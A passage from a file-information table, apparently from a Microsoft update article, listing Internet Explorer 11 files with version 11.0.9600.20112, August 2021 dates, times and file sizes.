19-Aug-2021| 19:49| 46,080 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 51,712 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 54,272 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 45,056 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 39,936 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 39,424 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 51,200 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 35,328 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 11,264 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 9,216 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 6,656 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 4,858,880 \njsproxy.dll| 11.0.9600.20112| 13-Aug-2021| 20:16| 54,784 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 73,728 \niedkcs32.dll| 18.0.9600.20112| 19-Aug-2021| 19:48| 390,544 \ninstall.ins| Not versioned| 13-Aug-2021| 17:52| 464 \nieapfltr.dat| 10.0.9301.0| 5-Mar-2021| 22:14| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:11| 800,768 \ntdc.ocx| 11.0.9600.20112| 13-Aug-2021| 19:57| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.20112| 13-Aug-2021| 20:25| 666,624 \niedvtool.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.20112| 13-Aug-2021| 20:27| 50,176 \ndxtmsft.dll| 11.0.9600.20112| 13-Aug-2021| 20:03| 491,008 \ndxtrans.dll| 11.0.9600.20112| 13-Aug-2021| 19:51| 316,416 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 13-Aug-2021| 17:50| 11,892 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20112| 13-Aug-2021| 20:02| 245,248 \nF12Resources.dll| 11.0.9600.20112| 13-Aug-2021| 20:30| 10,949,120 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 20:01| 372,224 \nF12.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 1,422,848 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 809,472 \nmsfeeds.mof| Not versioned| 13-Aug-2021| 18:03| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:03| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 60,416 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:24| 13,312 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:22| 417,280 \nmshtmled.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 92,672 \nmshtmlmedia.dll| 11.0.9600.20112| 13-Aug-2021| 19:40| 1,359,872 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 25,759,232 \nmshtml.tlb| 11.0.9600.20112| 13-Aug-2021| 20:35| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 13-Aug-2021| 17:51| 3,228 \nieetwcollector.exe| 11.0.9600.20112| 13-Aug-2021| 20:12| 116,224 \nieetwproxystub.dll| 11.0.9600.20112| 13-Aug-2021| 20:22| 48,640 \nieetwcollectorres.dll| 11.0.9600.20112| 13-Aug-2021| 20:34| 4,096 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 20:14| 222,720 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:10| 870,400 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:15| 387,072 \nWindows Pop-up Blocked.wav| Not versioned| 5-Mar-2021| 22:16| 85,548 \nWindows Information Bar.wav| Not versioned| 5-Mar-2021| 22:16| 23,308 \nWindows Feed Discovered.wav| Not versioned| 5-Mar-2021| 22:16| 19,884 \nWindows Navigation Start.wav| Not versioned| 5-Mar-2021| 22:16| 11,340 \nbing.ico| Not versioned| 5-Mar-2021| 22:15| 5,430 \nieUnatt.exe| 11.0.9600.20112| 13-Aug-2021| 20:12| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 19-Aug-2021| 20:52| 2,956 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:54| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.20112| 13-Aug-2021| 20:10| 1,862,656 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:21| 88,064 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:49| 1,217,024 \noccache.dll| 11.0.9600.20112| 13-Aug-2021| 19:49| 152,064 \ndesktop.ini| Not versioned| 5-Mar-2021| 22:14| 65 \nwebcheck.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 262,144 \ndesktop.ini| Not versioned| 5-Mar-2021| 22:14| 65 \nmsrating.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 199,680 \nicrav03.rat| Not versioned| 5-Mar-2021| 22:14| 8,798 \nticrf.rat| Not versioned| 5-Mar-2021| 22:14| 1,988 \niertutil.dll| 11.0.9600.20112| 13-Aug-2021| 20:30| 2,916,864 \nsqmapi.dll| 6.2.9200.16384| 19-Aug-2021| 19:48| 286,088 \nie4uinit.exe| 11.0.9600.20112| 13-Aug-2021| 19:40| 728,064 \niernonce.dll| 11.0.9600.20112| 13-Aug-2021| 20:15| 34,304 \niesetup.dll| 11.0.9600.20112| 13-Aug-2021| 20:23| 66,560 \nieuinit.inf| Not versioned| 13-Aug-2021| 18:52| 16,303 \ninseng.dll| 11.0.9600.20112| 13-Aug-2021| 19:56| 107,520 \nTimeline.dll| 11.0.9600.20112| 13-Aug-2021| 19:55| 219,648 \nTimeline_is.dll| 11.0.9600.20112| 13-Aug-2021| 20:15| 172,032 \nTimeline.cpu.xml| Not versioned| 5-Mar-2021| 22:14| 3,197 \nVGX.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 1,018,880 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 2,066,432 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 2,121,216 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 2,063,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 2,314,240 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 2,390,528 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 2,033,152 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 2,255,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 2,061,312 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 2,326,016 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 2,019,840 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 2,071,040 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 2,082,816 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 2,170,368 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 2,153,984 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 2,291,712 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 2,283,520 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 2,052,096 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 2,301,952 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 2,093,056 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 2,299,392 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 2,094,592 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,316,800 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 2,305,536 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 2,278,912 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 2,285,568 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 2,060,288 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 2,315,776 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 2,279,424 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 2,324,992 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 2,098,176 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 3,072 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 15,506,432 \nieui.dll| 11.0.9600.20112| 13-Aug-2021| 20:14| 615,936 \nieframe.ptxml| Not versioned| 13-Aug-2021| 17:50| 24,486 \nieinstal.exe| 11.0.9600.20112| 13-Aug-2021| 19:51| 492,032 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:49| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:50| 751,460 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:50| 526,344 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:51| 499,707 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:52| 552,390 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:52| 944,611 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:53| 457,561 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:53| 543,995 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:53| 751,322 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:54| 526,606 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:55| 575,890 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:55| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:56| 751,159 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:57| 570,788 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:57| 548,168 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:58| 639,283 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:59| 525,516 \nInetRes.adml| Not versioned| 19-Aug-2021| 19:59| 751,384 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:00| 751,462 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:01| 488,539 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:01| 548,544 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:02| 559,392 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:02| 535,117 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:03| 541,508 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:04| 751,367 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:04| 804,518 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:05| 751,481 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:05| 751,405 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:06| 751,372 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:07| 503,957 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:07| 751,322 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:08| 521,632 \nInetRes.adml| Not versioned| 19-Aug-2021| 